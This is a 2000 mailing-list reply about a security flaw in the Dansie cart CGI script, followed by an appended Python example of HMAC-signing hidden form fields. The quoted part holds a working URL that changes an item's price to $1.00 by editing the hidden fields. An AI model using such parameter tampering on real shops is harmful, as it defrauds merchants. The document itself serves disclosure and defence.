On Fri, 14 Apr 2000, tombow wrote:

> if installing a backdoor in the cart software wasn't bad enough.. the
> whole implementation of pricing and adding items to cart is crap..
>
> example form to add items to your cart (kindly provided on the publisher's
> site using the demo cart they set up for us):
>
> *snip*
>
> <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
>
> Black Leather purse with leather straps<BR>
> Price: $20.00<BR>
>
> <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling -->
> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
>
> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
> </FORM>
>
> *snip*
>
>
> a couple of quick alterations and we can now add:
>
> one piece of crap cart software..
>
> http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
>

This occurs because the person who configured the script failed to set "personal variable #66". Dansie has since done that at www.dansie.net so that the above URL now fails to change the shopping cart variables.

Pete
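The following is an added example, not part of the original message and not Dansie's code or a description of what its configuration variable does. It shows one way a cart that takes its item data from static HTML forms can refuse altered fields: the merchant appends an HMAC tag over the hidden fields and the cart recomputes it before accepting the item. The key, the `sig` parameter and the function names are assumptions made for the illustration.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

# Constructed key for this example; it must exist only on the server.
SECRET_KEY = b"example-key-not-for-production"
# Hidden fields from the quoted form that the shopper must not be able to change.
PROTECTED = ("name", "price", "sh", "img", "return", "custom1")

# Field values taken from the form quoted in the message.
ITEM = {
    "name": "Black leather purse",
    "price": "20.00",
    "sh": "1",
    "img": "purse.jpg",
    "return": "http://www.dansie.net/demo.html",
    "custom1": "Black leather purse with leather straps",
}


def sign_item(fields):
    """Return a hex HMAC-SHA256 tag over the protected fields, in fixed order."""
    # Length-prefix each value so text cannot be shifted between adjacent fields.
    msg = b"".join(
        b"%d:%s;" % (len(v), v)
        for v in (fields.get(k, "").encode() for k in PROTECTED)
    )
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def build_add_url(base, fields):
    """Merchant side: build the add-to-cart URL with the tag appended as sig."""
    params = {k: fields[k] for k in PROTECTED}
    params["sig"] = sign_item(params)
    return base + "?" + urlencode(params)


def accept_item(query_string):
    """Cart side: return the item dict if the tag verifies, otherwise None."""
    pairs = parse_qsl(query_string, keep_blank_values=True)
    keys = [k for k, _ in pairs]
    # Reject repeated parameters so the verified copy is the copy that gets used.
    if len(keys) != len(set(keys)):
        return None
    params = dict(pairs)
    tag = params.pop("sig", "")
    if not hmac.compare_digest(tag.encode(), sign_item(params).encode()):
        return None
    return {k: params.get(k, "") for k in PROTECTED}
```

A tag of this kind only binds the fields to each other; a signed form with an old price stays valid until the key is changed, so price updates require re-signing the forms.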
